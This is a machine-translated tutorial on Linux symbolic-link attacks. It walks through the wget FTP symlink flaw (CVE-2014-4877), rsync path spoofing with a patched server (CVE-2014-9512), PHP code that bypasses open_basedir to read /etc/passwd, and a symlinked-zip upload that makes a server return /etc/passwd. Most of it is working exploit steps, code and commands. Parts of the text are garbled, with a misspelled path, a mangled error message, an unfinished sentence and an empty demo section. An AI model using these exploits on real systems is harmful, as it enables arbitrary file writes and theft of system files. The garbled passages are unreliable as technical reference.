Linux symbolic link attack tutorial

Linux symbolic link attack tutorial
0 × 00 Preface

Linux is the most widely used open-source system. Its unique file system can be regarded as one of the core components supporting the powerful functions of Linux. In the file system, symbolic link) similar to the treasure chest, you can use shuttle time and space to freely cross strict path restrictions. This feature makes it an important part of the entire Linux system, through practical analysis and research, this article will thoroughly explore various security problems that may occur due to improper handling of symbolic links, so as to attract attention to such problems.

 

0 × 01 Client

When the client recursively processes a file, it can write any file and execute the Code through symbolic link traversal.

Case:

1. Wget ftp symbolic link attack (CVE-2014-4877)

When wget recursively downloads an ftp site, such as wget-m ftp: // 127.0.0.1, the following data is forged on the server:

lrwxrwxrwx 1 root root 33 Oct 11 2013 fakedir -> /tmpdrwxrwxr-x 15 root root 4096 Oct 11 2013 fakedir

A symbolic link named fakedir will be created locally, pointing to the/tmp directory. When wget sends the cwd command, it recursively enters the fakedir and sends the LIST command. In this case, a malicious file or

For example:

-rwx------ 1 root root 21 Aug 29 2013 pwned

When the RETR command downloads the pwned file, the returned file content (binary or text) is returned ). Attackers can fool arbitrary directory write on the wget client.

Specific exploitation Script: https://github.com/yaseng/pentest/blob/master/exploit/wget-symlink_attack_exploit.py

Vulnerability Demonstration:

Server(attacker)  wget-symlink_attack_exploit.pyClient(victim)    wget -m ftp://127.0.0.1

2: Rsync path spoofing attack vulnerability (CVE-2014-9512)

After analyzing the wget vulnerability, I found that when rsync recursively synchronizes files, it can also use Symbolic Links to fool the path. Due to the complexity of the rsync bidirectional file processing algorithm, it is impossible to directly use strings to forge file streams. First, create a symbolic link pointing to/root/In the rsync shared folder /,

[root@pentest rsync]# ls  -lh
total 8.0K
-rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
lrwxrwxrwx 1 root root    6 Oct 31 05:09 fakedir -> /root/
drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir

Writing Test files to truedir

[root@pentest rsync]# cd  truedir/
[root@pentest truedir]# ls
[root@pentest truedir]# echo rsync  test  >  pwned
[root@pentest truedir]# ls -lh
total 4.0K
-rw-r--r-- 1 root root 11 Oct 31 05:17 pwned
[root@pentest truedir]# 

Modify the code of the file list sent by the server.

file: rsync-3.1.1/flist.c    line:394
static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
                const char *symlink_name, int symlink_len,
#endif
                int ndx, int first_ndx)
{
  if(strcmp(fname,"turedir/pwned") == 0){

    fname="fakedir/pwned";  // symbolic link 
//change  file  true path(truedir) to  symbolic link  (fakedir)
)

Due to the strict data validation on the server, the following error occurs: "stored ed request to transfer non-regular file fakedir/pwned. test 7 [sender] "causes the client to fail to execute synchronization, but for attackers, the server is controllable and can directly comment out the corresponding code.

/* if (iflags & ITEM_TRANSFER) {
        int i = ndx - cur_flist->ndx_start;
        if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
            rprintf(FERROR,
                "received request to transfer non-regular file: %d [%s]\n",
                ndx, who_am_i());
            exit_cleanup(RERR_PROTOCOL);
        }
    }
*/

Vulnerability Demonstration:

Client (victim ):

0 × 02 web programs

When files are accessed through http, improper handling of symbolic links by the web server may result in unauthorized access, file reading, and other security risks.

Case:

1. php generic bypass open_basedir to read arbitrary files

Use the symlink function and mkdir function to create a symbolic link pointing to the target. The Code is as follows:

<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");  // delete
mkdir("tmplink");
?>

Generate a file

drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink

Exploit already points to/etc/passwd. You can bypass php open_basedir to protect files from direct static access through web server such as Apache.

2. facebook local file reading

When the server automatically decompress the zip, tar, and other compression formats that support symbolic links. You can use Symbolic Links to read server files, such as facebook local files.

1. create a symbolic link file pointing to/etc/passwd ln-s/etc/passwd link 2. compress the file and keep the link zip -- symlinks test.zip link 3. upload the test.zip file. The system automatically decompress the file. the/etc/passwd content is returned on the page.